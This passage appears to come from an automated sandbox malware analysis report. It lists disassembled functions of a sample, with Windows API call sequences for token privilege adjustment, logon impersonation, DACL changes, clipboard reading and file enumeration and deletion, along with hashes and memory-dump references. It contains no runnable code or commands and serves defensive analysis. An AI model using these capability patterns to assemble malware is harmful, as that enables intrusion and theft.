                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                  • Opcode ID: f855498dfa89f274706e287c74c8c4a98e8dff1c1fd116621d856a6705eb3441
                                                                                                                                                                                                                                                                  • Instruction ID: 873051c4486cc406075ffd7343b532e1428ca1d70c56e1ba19e83bb6eaa3de6a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f855498dfa89f274706e287c74c8c4a98e8dff1c1fd116621d856a6705eb3441
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7F01271914354DFE7539B64DC497AA7AFCA701708F0401A9A648E6382D7745788CB61
                                                                                                                                                                                                                                                                  Function 00CE3A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00CE3A76
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 541455249-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5fb1897d6eee3930c341e939a4c9a49444f737241abcc61bc86c5a6a3f88afec
                                                                                                                                                                                                                                                                  • Instruction ID: d53be8099251fce92ad71833206662bfcc8a0e5c1e0853350e967c0611f6145d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fb1897d6eee3930c341e939a4c9a49444f737241abcc61bc86c5a6a3f88afec
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAE0C272A012246BCB20E258AC06FEA77EDDFC87A0F0440B5FC09D7258ED61EDC096A4
                                                                                                                                                                                                                                                                  Function 00D2071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000000,?,00D20A84,?,?,00000000,?,00D20A84,00000000,0000000C), ref: 00D20737
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9ddbc55f6a0a726c36add5175e0290c8a6f2466ff841a20e810ce8e31676f0ab
                                                                                                                                                                                                                                                                  • Instruction ID: 8c282e2bd579f958058cbf673229164a2557f6439b8a96d36bf13c7320d4a7c5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ddbc55f6a0a726c36add5175e0290c8a6f2466ff841a20e810ce8e31676f0ab
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8D06C3200020DBBDF028F84DD06EDA3BAAFB48714F014050BE1896120C732E861AB90
                                                                                                                                                                                                                                                                  Function 00D4EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00D4D840), ref: 00D4EAB1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0c7e08be8bf33cf4eff89df179237a3f13f67fa7b450509f087243a436ca8b64
                                                                                                                                                                                                                                                                  • Instruction ID: c7b4eff4762cb4d23e4101d81f753967623a3ca7a8d0765f47e4f7e75854074f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c7e08be8bf33cf4eff89df179237a3f13f67fa7b450509f087243a436ca8b64
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AB0922400060026AD380A385A0AAA9331178423A57DC1BC0E479961E2D339884FBD70
                                                                                                                                                                                                                                                                  Function 00D5664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DC54: FindFirstFileW.KERNEL32(?,?), ref: 00D4DCCB
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00D4DD1B
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00D4DD2C
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DC54: FindClose.KERNEL32(00000000), ref: 00D4DD43
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D5666E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2819cb07002de84f72bac180510d982d79a681b9906e2157371559eadc2d398a
                                                                                                                                                                                                                                                                  • Instruction ID: de45531864342f6bb859729b67c59970781c242be45c00fb0ffe6ba965981e26
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2819cb07002de84f72bac180510d982d79a681b9906e2157371559eadc2d398a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEF08C362002148FCB10EF59D855B6EB7E9AF88360F048449F9099B362CB74BC01CBA1

                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                  Function 00D41B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D42010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D4205A
                                                                                                                                                                                                                                                                    • Part of subcall function 00D42010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D42087
                                                                                                                                                                                                                                                                    • Part of subcall function 00D42010: GetLastError.KERNEL32 ref: 00D42097
                                                                                                                                                                                                                                                                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00D41BD2
                                                                                                                                                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00D41BF4
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00D41C05
                                                                                                                                                                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D41C1D
                                                                                                                                                                                                                                                                  • GetProcessWindowStation.USER32 ref: 00D41C36
                                                                                                                                                                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00D41C40
                                                                                                                                                                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00D41C5C
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D41B48), ref: 00D41A20
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A0B: CloseHandle.KERNEL32(?,?,00D41B48), ref: 00D41A35
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                  • String ID: $default$winsta0
                                                                                                                                                                                                                                                                  • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                  • Opcode ID: 4dc655cc8e56f4f9f017a5da329a2a3b7142ec47cfc723a603006ec26698d20b
                                                                                                                                                                                                                                                                  • Instruction ID: 66dd7ca5dd26bcd78d2e35517f9d5a639be36848be213124d8e86bd45eae3f50
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4dc655cc8e56f4f9f017a5da329a2a3b7142ec47cfc723a603006ec26698d20b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 518148B5900309ABDF119FA4DC49FEE7BB9EF08304F184129F919E62A0E7758985CB74
                                                                                                                                                                                                                                                                  Function 00D414AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D41A60
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A6C
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A7B
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D41A99
                                                                                                                                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D41518
                                                                                                                                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D4154C
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00D41563
                                                                                                                                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00D4159D
                                                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D415B9
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00D415D0
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00D415D8
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00D415DF
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D41600
                                                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00D41607
                                                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D41636
                                                                                                                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D41658
                                                                                                                                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D4166A
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D41691
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D41698
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D416A1
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D416A8
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D416B1
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D416B8
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00D416C4
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D416CB
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41ADF: GetProcessHeap.KERNEL32(00000008,00D414FD,?,00000000,?,00D414FD,?), ref: 00D41AED
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00D414FD,?), ref: 00D41AF4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00D414FD,?), ref: 00D41B03
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                  • Opcode ID: 362132f09dd4863fa0dac3f988b742db8f66d33190cd01101ea715b695f8a92b
                                                                                                                                                                                                                                                                  • Instruction ID: 7e6cf082ffcfa79577ca045655e2ad1ed9a80d99e5b58c806a936ac577352a6e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 362132f09dd4863fa0dac3f988b742db8f66d33190cd01101ea715b695f8a92b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C715BB6900209ABDF10DFA5DC49FEEBBB9BF04350F094615E919E6290E731D985CBB0
                                                                                                                                                                                                                                                                  Function 00D5F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • OpenClipboard.USER32(00D7DCD0), ref: 00D5F586
                                                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00D5F594
                                                                                                                                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00D5F5A0
                                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00D5F5AC
                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00D5F5E4
                                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00D5F5EE
                                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00D5F619
                                                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00D5F626
                                                                                                                                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00D5F62E
                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00D5F63F
                                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00D5F67F
                                                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 00D5F695
                                                                                                                                                                                                                                                                  • GetClipboardData.USER32(0000000F), ref: 00D5F6A1
                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00D5F6B2
                                                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00D5F6D4
                                                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00D5F6F1
                                                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00D5F72F
                                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00D5F750
                                                                                                                                                                                                                                                                  • CountClipboardFormats.USER32 ref: 00D5F771
                                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00D5F7B6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 420908878-0
                                                                                                                                                                                                                                                                  • Opcode ID: b52eb9178c69ea96dd7421a594dc79310f486f32e9ccd71d137f0d915e51d43b
                                                                                                                                                                                                                                                                  • Instruction ID: 820a9249f6143973261422d9bcff1e4391a2772faf0f7fca3e8a851e01aa1a1d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b52eb9178c69ea96dd7421a594dc79310f486f32e9ccd71d137f0d915e51d43b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F619E352043419FD700EF20D884E2AB7B5AF88705F184568FC8ACB2A2EB31ED49DB71
                                                                                                                                                                                                                                                                  Function 00D573D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00D57403
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D57457
                                                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D57493
                                                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D574BA
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D574F7
                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D57524
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                  • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                  • Opcode ID: 973d0bc0a729e50d39d9b8bf7ed078cf2aff59c7054ce215d96122c52a5460dc
                                                                                                                                                                                                                                                                  • Instruction ID: 53382557726bad9ea766043e6769473425b072554860197b354af98ddf0412f4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 973d0bc0a729e50d39d9b8bf7ed078cf2aff59c7054ce215d96122c52a5460dc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2D16072508344AEC710EB65C881EBFB7ECAF98704F44091DF989D6252EB74DA48DB62
                                                                                                                                                                                                                                                                  Function 00D5A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00D5A0A8
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00D5A0E6
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00D5A100
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00D5A118
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D5A123
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00D5A13F
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D5A18F
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00DA7B94), ref: 00D5A1AD
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D5A1B7
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D5A1C4
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D5A1D4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
